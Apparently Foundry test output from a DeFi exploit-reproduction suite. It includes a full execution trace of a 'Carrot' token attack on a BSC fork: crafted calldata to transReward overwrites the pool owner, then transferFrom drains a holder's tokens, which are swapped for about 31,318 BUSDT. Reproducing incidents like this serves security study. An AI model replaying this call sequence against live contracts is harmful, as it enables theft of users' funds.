Compiling 23 files with Solc 0.8.28
Solc 0.8.28 finished in 1.31s
Compiler run successful with warnings:
Warning (2519): This declaration shadows an existing declaration.
    --> src/test/interface.sol:1084:5:
     |
1084 |     function WETH() external view returns (address);
     |     ^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^
Note: The shadowed declaration is here:
   --> src/test/interface.sol:805:1:
    |
805 | interface WETH {
    | ^ (Relevant source part starts here and spans across multiple lines).

Warning (2519): This declaration shadows an existing declaration.
    --> src/test/interface.sol:1896:5:
     |
1896 |     function WETH() external view returns (address);
     |     ^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^
Note: The shadowed declaration is here:
   --> src/test/interface.sol:805:1:
    |
805 | interface WETH {
    | ^ (Relevant source part starts here and spans across multiple lines).

Warning (2519): This declaration shadows an existing declaration.
    --> src/test/interface.sol:2198:5:
     |
2198 |     function WETH() external view returns (address);
     |     ^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^
Note: The shadowed declaration is here:
   --> src/test/interface.sol:805:1:
    |
805 | interface WETH {
    | ^ (Relevant source part starts here and spans across multiple lines).

Warning (2519): This declaration shadows an existing declaration.
    --> src/test/interface.sol:2967:5:
     |
2967 |     function WETH() external view returns (address);
     |     ^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^
Note: The shadowed declaration is here:
   --> src/test/interface.sol:805:1:
    |
805 | interface WETH {
    | ^ (Relevant source part starts here and spans across multiple lines).

Warning (2519): This declaration shadows an existing declaration.
    --> src/test/interface.sol:4424:5:
     |
4424 |     function WETH() external view returns (address);
     |     ^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^
Note: The shadowed declaration is here:
   --> src/test/interface.sol:805:1:
    |
805 | interface WETH {
    | ^ (Relevant source part starts here and spans across multiple lines).


Ran 1 test for script/Exploit-template_new.sol:ExploitScript
[PASS] testExploit() (gas: 23756)
Logs:
  Attacker ETH Balance Before exploit: 0.000000000000000000
  Attacker ETH Balance After exploit: 0.000000000000000000

Traces:
  [7939] ExploitScript::setUp()
    ├─ [0] VM::createSelectFork("mainnet", 1234567 [1.234e6])
    │   └─ ← [Return] 0
    └─ ← [Stop]

  [23756] ExploitScript::testExploit()
    ├─ [0] VM::deal(ExploitScript: [0x7FA9385bE102ac3EAc297483Dd6233D62b3e1496], 0)
    │   └─ ← [Return]
    ├─ emit log_named_decimal_uint(key: "Attacker ETH Balance Before exploit", val: 0, decimals: 18)
    ├─ emit log_named_decimal_uint(key: "Attacker ETH Balance After exploit", val: 0, decimals: 18)
    └─ ← [Stop]

Suite result: ok. 1 passed; 0 failed; 0 skipped; finished in 3.20s (2.05ms CPU time)

Ran 1 test for src/test/2022-10/Carrot_exp.sol:ContractTest
[PASS] testExploit() (gas: 395042)
Logs:
  [Start] Attacker BUSDT balance before exploit: 0.000000000000000000
  [End] Attacker BUSDT balance after exploit: 31318.180838433700165284

Traces:
  [7267] ContractTest::setUp()
    ├─ [0] VM::createSelectFork("bsc", 22055611 [2.205e7])
    │   └─ ← [Return] 0
    ├─ [0] VM::label(PS_ROUTER: [0x10ED43C718714eb63d5aA57B78B54704E256024E], "PS_ROUTER")
    │   └─ ← [Return]
    ├─ [0] VM::label(CARROT_TOKEN: [0xcFF086EaD392CcB39C49eCda8C974ad5238452aC], "CARROT_TOKEN")
    │   └─ ← [Return]
    ├─ [0] VM::label(BUSDT_TOKEN: [0x55d398326f99059fF775485246999027B3197955], "BUSDT_TOKEN")
    │   └─ ← [Return]
    ├─ [0] VM::label(CARROT_BUSDT_PAIR: [0xF34c9a6AaAc94022f96D4589B73d498491f817FA], "CARROT_BUSDT_PAIR")
    │   └─ ← [Return]
    ├─ [0] VM::label(Pool: [0x6863b549bf730863157318df4496eD111aDFA64f], "Pool")
    │   └─ ← [Return]
    └─ ← [Stop]

  [400642] ContractTest::testExploit()
    ├─ [2531] BUSDT_TOKEN::balanceOf(ContractTest: [0x7FA9385bE102ac3EAc297483Dd6233D62b3e1496]) [staticcall]
    │   └─ ← [Return] 0
    ├─ emit log_named_decimal_uint(key: "[Start] Attacker BUSDT balance before exploit", val: 0, decimals: 18)
    ├─ [19913] CARROT_TOKEN::transReward(0xbf699b4b0000000000000000000000007fa9385be102ac3eac297483dd6233d62b3e1496)
    │   ├─ [12979] Pool::bf699b4b(0000000000000000000000007fa9385be102ac3eac297483dd6233d62b3e1496)
    │   │   ├─  storage changes:
    │   │   │   @ 5: 0x0000000000000000000000008958c8689d325fd9e2a1ede3d5dc1acfcfb65742 → 0x0000000000000000000000007fa9385be102ac3eac297483dd6233d62b3e1496
    │   │   └─ ← [Stop]
    │   └─ ← [Stop]
    ├─ [153155] CARROT_TOKEN::transferFrom(0x00B433800970286CF08F34C96cf07f35412F1161, ContractTest: [0x7FA9385bE102ac3EAc297483Dd6233D62b3e1496], 310344736073087429864760 [3.103e23])
    │   ├─ [611] Pool::owner() [staticcall]
    │   │   └─ ← [Return] ContractTest: [0x7FA9385bE102ac3EAc297483Dd6233D62b3e1496]
    │   ├─ emit Transfer(from: 0x00B433800970286CF08F34C96cf07f35412F1161, to: ContractTest: [0x7FA9385bE102ac3EAc297483Dd6233D62b3e1496], value: 310344736073087429864760 [3.103e23])
    │   ├─ [2537] CARROT_BUSDT_PAIR::balanceOf(0xfE6d6bc4aC1ED6DD6875Ca8a9137760CB3A931dF) [staticcall]
    │   │   └─ ← [Return] 0
    │   ├─  storage changes:
    │   │   @ 0x1da434b76eba4736d6e760bfd78cbf883a0776ee1666a9157f99ab1b97923a3c: 0 → 1
    │   │   @ 0xa20c45dd8a851b8b8653a17982859bee31b444ff681134f34d4fa90171fb1a2a: 0 → 0x00000000000000000000000000b433800970286cf08f34c96cf07f35412f1161
    │   │   @ 0xb38645331535d8a24250bd866c230d0d85c11b90105fdba49ccc7bb4d9c6bc96: 0 → 0x0000000000000000000000000000000000000000000041b7d264fd973d1b6d38
    │   │   @ 33: 0x000000000000000000000000f34c9a6aaac94022f96d4589b73d498491f817fa → 0x0000000000000000000000007fa9385be102ac3eac297483dd6233d62b3e1496
    │   │   @ 0x48bcd541d1c6e17e54371c9cd080f9b1b869ece3b31a417ae149fc855695ec0b: 0x0000000000000000000000000000000000000000000041b81d9331f9def33d38 → 0x0000000000000000000000000000000000000000000000004b2e3462a1d7d000
    │   │   @ 32: 0x000000000000000000000000fe6d6bc4ac1ed6dd6875ca8a9137760cb3a931df → 0x00000000000000000000000000b433800970286cf08f34c96cf07f35412f1161
    │   │   @ 4: 0 → 1
    │   └─ ← [Return] true
    ├─ [25295] CARROT_TOKEN::approve(PS_ROUTER: [0x10ED43C718714eb63d5aA57B78B54704E256024E], 115792089237316195423570985008687907853269984665640564039457584007913129639935 [1.157e77])
    │   ├─ emit Approval(owner: ContractTest: [0x7FA9385bE102ac3EAc297483Dd6233D62b3e1496], spender: PS_ROUTER: [0x10ED43C718714eb63d5aA57B78B54704E256024E], value: 115792089237316195423570985008687907853269984665640564039457584007913129639935 [1.157e77])
    │   ├─  storage changes:
    │   │   @ 0x40efe119f1031eb281b5b195ed42e00327d441da2528f3ffaa1e7fa89579fa7f: 0 → 0xffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffff
    │   └─ ← [Return] true
    ├─ [908] CARROT_TOKEN::balanceOf(ContractTest: [0x7FA9385bE102ac3EAc297483Dd6233D62b3e1496]) [staticcall]
    │   └─ ← [Return] 310344736073087429864760 [3.103e23]
    ├─ [177459] PS_ROUTER::swapExactTokensForTokensSupportingFeeOnTransferTokens(310344736073087429864760 [3.103e23], 0, [0xcFF086EaD392CcB39C49eCda8C974ad5238452aC, 0x55d398326f99059fF775485246999027B3197955], ContractTest: [0x7FA9385bE102ac3EAc297483Dd6233D62b3e1496], 1665406418 [1.665e9])
    │   ├─ [113166] CARROT_TOKEN::transferFrom(ContractTest: [0x7FA9385bE102ac3EAc297483Dd6233D62b3e1496], CARROT_BUSDT_PAIR: [0xF34c9a6AaAc94022f96D4589B73d498491f817FA], 310344736073087429864760 [3.103e23])
    │   │   ├─ [611] Pool::owner() [staticcall]
    │   │   │   └─ ← [Return] ContractTest: [0x7FA9385bE102ac3EAc297483Dd6233D62b3e1496]
    │   │   ├─ [2531] BUSDT_TOKEN::balanceOf(CARROT_TOKEN: [0xcFF086EaD392CcB39C49eCda8C974ad5238452aC]) [staticcall]
    │   │   │   └─ ← [Return] 35992633407838046 [3.599e16]
    │   │   ├─ emit Transfer(from: ContractTest: [0x7FA9385bE102ac3EAc297483Dd6233D62b3e1496], to: 0x000000000000000000000000000000000000dEaD, value: 1551723680365437149320 [1.551e21])
    │   │   ├─ emit Transfer(from: ContractTest: [0x7FA9385bE102ac3EAc297483Dd6233D62b3e1496], to: CARROT_TOKEN: [0xcFF086EaD392CcB39C49eCda8C974ad5238452aC], value: 10862065762558060045240 [1.086e22])
    │   │   ├─ emit Transfer(from: ContractTest: [0x7FA9385bE102ac3EAc297483Dd6233D62b3e1496], to: 0x00B433800970286CF08F34C96cf07f35412F1161, value: 4655171041096311447960 [4.655e21])
    │   │   ├─ emit Transfer(from: ContractTest: [0x7FA9385bE102ac3EAc297483Dd6233D62b3e1496], to: 0x0c5390550538Ef0215463b1E68524EA11bd1b3b3, value: 1551723680365437149320 [1.551e21])
    │   │   ├─ emit Transfer(from: ContractTest: [0x7FA9385bE102ac3EAc297483Dd6233D62b3e1496], to: CARROT_BUSDT_PAIR: [0xF34c9a6AaAc94022f96D4589B73d498491f817FA], value: 291724051908702184072160 [2.917e23])
    │   │   ├─ [2537] CARROT_BUSDT_PAIR::balanceOf(0x00B433800970286CF08F34C96cf07f35412F1161) [staticcall]
    │   │   │   └─ ← [Return] 0
    │   │   ├─ [2537] CARROT_BUSDT_PAIR::balanceOf(ContractTest: [0x7FA9385bE102ac3EAc297483Dd6233D62b3e1496]) [staticcall]
    │   │   │   └─ ← [Return] 0
    │   │   ├─ emit Approval(owner: ContractTest: [0x7FA9385bE102ac3EAc297483Dd6233D62b3e1496], spender: PS_ROUTER: [0x10ED43C718714eb63d5aA57B78B54704E256024E], value: 115792089237316195423570985008687907853269984665640563729112847934825699775175 [1.157e77])
    │   │   ├─  storage changes:
    │   │   │   @ 0xbf83c68fcd4a6cd28e399f537b7fb27d99bc4d4cf6c4cb1f4c8865fba9fea6e5: 0x000000000000000000000000000000000000000000002fab54b4707c91a43104 → 0x000000000000000000000000000000000000000000002fff73326265014e918c
    │   │   │   @ 0xb38645331535d8a24250bd866c230d0d85c11b90105fdba49ccc7bb4d9c6bc96: 0x0000000000000000000000000000000000000000000041b7d264fd973d1b6d38 → 760
    │   │   │   @ 12: 0x00000000000000000000000000000000000000000000d395672a8e6375a6f5ec → 0x00000000000000000000000000000000000000000000d34148ac9c7b05fc9564
    │   │   │   @ 33: 0x0000000000000000000000007fa9385be102ac3eac297483dd6233d62b3e1496 → 0x000000000000000000000000f34c9a6aaac94022f96d4589b73d498491f817fa
    │   │   │   @ 0xb34209a263f6c38fe55f099e9e70f9d67e93982480ff3234a5e0108028ad164d: 0x00000000000000000000000000000000000000000000002cb4a447a279cbaa14 → 0x000000000000000000000000000000000000000000000080d322398ae9760a9c
    │   │   │   @ 0x48bcd541d1c6e17e54371c9cd080f9b1b869ece3b31a417ae149fc855695ec0b: 0x0000000000000000000000000000000000000000000000004b2e3462a1d7d000 → 0x0000000000000000000000000000000000000000000000fca6a80a1bf0d6f198
    │   │   │   @ 0x50806b5fec72182ae612226c0727f3c74ce29b5ace29ce014a08273f16a515a3: 0x0000000000000000000000000000000000000000000001837dc6dd2cb675bcbc → 0x0000000000000000000000000000000000000000000003d053387a87c41e6074
    │   │   │   @ 0xdd7b68113ea2813d7493f29871d869b10feeee083a2d1e4bfcb2b1b8bf83c488: 0x00000000000000000000000000000000000000000000213c18d0f23d1fd992de → 0x000000000000000000000000000000000000000000005f027d4e98ef20f876be
    │   │   │   @ 32: 0x00000000000000000000000000b433800970286cf08f34c96cf07f35412f1161 → 0x0000000000000000000000007fa9385be102ac3eac297483dd6233d62b3e1496
    │   │   │   @ 0x40efe119f1031eb281b5b195ed42e00327d441da2528f3ffaa1e7fa89579fa7f: 0xffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffff → 0xffffffffffffffffffffffffffffffffffffffffffffbe482d9b0268c2e492c7
    │   │   │   @ 30: 0x000000000000000000000000000000000000000000000181d49f37eb31d7e6d2 → 0x00000000000000000000000000000000000000000000037a8b92e35dcfd62a02
    │   │   │   @ 31: 0x000000000000000000000000000000000000000000000001a92780e04ad355ea → 0x000000000000000000000000000000000000000000000055c7a572c8ba7db672
    │   │   └─ ← [Return] true
    │   ├─ [531] BUSDT_TOKEN::balanceOf(ContractTest: [0x7FA9385bE102ac3EAc297483Dd6233D62b3e1496]) [staticcall]
    │   │   └─ ← [Return] 0
    │   ├─ [2893] CARROT_BUSDT_PAIR::getReserves() [staticcall]
    │   │   └─ ← [Return] 48209498833902838587795 [4.82e22], 156946686774517272515294 [1.569e23], 1665406418 [1.665e9]
    │   ├─ [908] CARROT_TOKEN::balanceOf(CARROT_BUSDT_PAIR: [0xF34c9a6AaAc94022f96D4589B73d498491f817FA]) [staticcall]
    │   │   └─ ← [Return] 448670738683219456587454 [4.486e23]
    │   ├─ [52238] CARROT_BUSDT_PAIR::swap(31318180838433700165284 [3.131e22], 0, ContractTest: [0x7FA9385bE102ac3EAc297483Dd6233D62b3e1496], 0x)
    │   │   ├─ [27971] BUSDT_TOKEN::transfer(ContractTest: [0x7FA9385bE102ac3EAc297483Dd6233D62b3e1496], 31318180838433700165284 [3.131e22])
    │   │   │   ├─ emit Transfer(from: CARROT_BUSDT_PAIR: [0xF34c9a6AaAc94022f96D4589B73d498491f817FA], to: ContractTest: [0x7FA9385bE102ac3EAc297483Dd6233D62b3e1496], value: 31318180838433700165284 [3.131e22])
    │   │   │   ├─  storage changes:
    │   │   │   │   @ 0xdd7b68113ea2813d7493f29871d869b10feeee083a2d1e4bfcb2b1b8bf83c488: 0x000000000000000000000000000000000000000000000a357131f4901341a193 → 0x000000000000000000000000000000000000000000000393ae207ed74539eaef
    │   │   │   │   @ 0xb38645331535d8a24250bd866c230d0d85c11b90105fdba49ccc7bb4d9c6bc96: 0 → 0x0000000000000000000000000000000000000000000006a1c31175b8ce07b6a4
    │   │   │   └─ ← [Return] true
    │   │   ├─ [531] BUSDT_TOKEN::balanceOf(CARROT_BUSDT_PAIR: [0xF34c9a6AaAc94022f96D4589B73d498491f817FA]) [staticcall]
    │   │   │   └─ ← [Return] 16891317995469138422511 [1.689e22]
    │   │   ├─ [908] CARROT_TOKEN::balanceOf(CARROT_BUSDT_PAIR: [0xF34c9a6AaAc94022f96D4589B73d498491f817FA]) [staticcall]
    │   │   │   └─ ← [Return] 448670738683219456587454 [4.486e23]
    │   │   ├─ emit Sync(reserve0: 16891317995469138422511 [1.689e22], reserve1: 448670738683219456587454 [4.486e23])
    │   │   ├─ emit Swap(sender: PS_ROUTER: [0x10ED43C718714eb63d5aA57B78B54704E256024E], amount0In: 0, amount1In: 291724051908702184072160 [2.917e23], amount0Out: 31318180838433700165284 [3.131e22], amount1Out: 0, to: ContractTest: [0x7FA9385bE102ac3EAc297483Dd6233D62b3e1496])
    │   │   ├─  storage changes:
    │   │   │   @ 8: 0x634415d200000000213c18d0f23d1fd992de000000000a357131f4901341a193 → 0x634415d2000000005f027d4e98ef20f876be000000000393ae207ed74539eaef
    │   │   └─ ← [Stop]
    │   ├─ [531] BUSDT_TOKEN::balanceOf(ContractTest: [0x7FA9385bE102ac3EAc297483Dd6233D62b3e1496]) [staticcall]
    │   │   └─ ← [Return] 31318180838433700165284 [3.131e22]
    │   └─ ← [Stop]
    ├─ [531] BUSDT_TOKEN::balanceOf(ContractTest: [0x7FA9385bE102ac3EAc297483Dd6233D62b3e1496]) [staticcall]
    │   └─ ← [Return] 31318180838433700165284 [3.131e22]
    ├─ emit log_named_decimal_uint(key: "[End] Attacker BUSDT balance after exploit", val: 31318180838433700165284 [3.131e22], decimals: 18)
    └─ ← [Stop]

Suite result: ok. 1 passed; 0 failed; 0 skipped; finished in 24.61s (22.72s CPU time)

Ran 2 test suites in 25.71s (27.81s CPU time): 2 tests passed, 0 failed, 0 skipped (2 total tests)
